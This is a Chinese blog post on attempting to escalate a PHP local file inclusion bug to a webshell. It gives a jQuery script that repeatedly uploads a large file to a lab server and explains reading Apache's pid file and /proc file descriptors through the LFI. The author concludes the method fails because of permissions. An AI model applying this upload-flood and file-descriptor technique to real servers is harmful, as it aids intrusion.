挖洞经验|把PHP LFI漏洞变成Webshell的思路

Bai

首先，我们需要不断上传文件到任意php脚本，这个文件最好还大一些。我用的是一个大概4mb的文件，似乎上传文件有大小限制，太大的文件我没有实验成功，也没有深究。然后就是写个程序不断上传这个文件就好，我用的是jquery+HTML。更理想一点应该是用python/java跑多线程。以下是源代码：

<html>
<body>
<script src="https://code.jquery.com/jquery-1.10.2.js"></script>

<form id="form" action="http://192.168.174.128/Default.php" method="post" enctype="multipart/form-data">
<input type="file" name="test">
<input type="submit">
</form>
<script>
$( "form" ).submit(function( event ) {
    uploadFiles(event);
    return;
});
var files;

$('input[type=file]').on('change', prepareUpload);

function prepareUpload(event)
{
  files = event.target.files;
}
function uploadFiles(event)
{
  event.stopPropagation();
    event.preventDefault();

   var data = new FormData();
    $.each(files, function(key, value)
    {
        data.append(key, value);
    });
    var i=0;
    for(;i<1000;i++){
        $.ajax({
            url: 'http://192.168.174.128/Default.php',
            type: 'POST',
            data: data,
            cache: false,
            dataType: 'json',
            processData: false,
            contentType: false,
            success: function(data, textStatus, jqXHR)
            {
                if(typeof data.error === 'undefined')
                {
                    submitForm(event, data);
                }
                else
                {
                    console.log('ERRORS: ' + data.error);
                }
            },
            error: function(jqXHR, textStatus, errorThrown)
            {
                console.log('ERRORS: ' + textStatus);
            }
        });
        //wait(100);
    }
}
function wait(ms){
   var start = new Date().getTime();
   var end = start;
   while(end < start + ms) {
     end = new Date().getTime();
  }
}
</script>
</body>
</html>

运行截图：

运行后可以在服务器上看到如下结果：

可以看到确实有临时文件创建了，而且也有文件描述符被创建，最重要的是文件描述符编号全部都是13，可能不同的机器上这个编号不同，但只要它是一个恒定的数字，那么就可以省去相当的多的猜解时间。比如只暴力猜测pid，运行多次，而每次只使用一个文件描述符编号就行。

接下来我就测试了一下是否能真的读到内容，我挑了3个pid，随便cat了几次，还真就成功了：

有人会说猜测pid也是一件很费劲的事，毕竟文件描述符只存在于读写文件的时候，即使php脚本执行时间很长，文件描述符也不会一直存在。且即使几个apache进程会不断处理上传的文件，但短时间内猜测一千到一两万的数字还是很难中的。后来经过我不断探索，发现apache的第一个进程的pid是可以直接读到的。用LFI直接读/var/run/apache2/apache2.pid就行，这个文件是所有用户可读的：

而apache创建的其他进程的pid会在这个编号上递增。而apache也就创建几个进程而已，所以猜测范围可能都不超过20。会有一两个进程的pid不按这个规律，我也不知道为啥，但并不碍事。

看到cat出内容的时候我那个激动啊，说明离成功只有一步之遥了，要是成功了就变成个大杀器了！然而当我通过浏览器进行暴力破解的时候怎么也不成功，我那个郁闷啊。后来看到错误日志的时候才彻底懵逼：

。。。我不是专搞php的，后来经过学习才发现虽然apache会以root运行，但它会创建子进程以www-data来运行php。而文件描述符是属于服务器权限内也就是root的，所以www-data读不了。我当时那个沮丧啊。。。。这就是这个思路最终沦为鸡肋的原因。文件描述符应该只有owner可读，也就是说要么apache和php都配置为同一个用户运行，要么就是用别的服务器运行php了。毕竟根据老外文章中给的python例子，服务器的权限一般和应用程序的一样，tomcat+Java也是同权限，只有apache+php这个组合有点奇葩。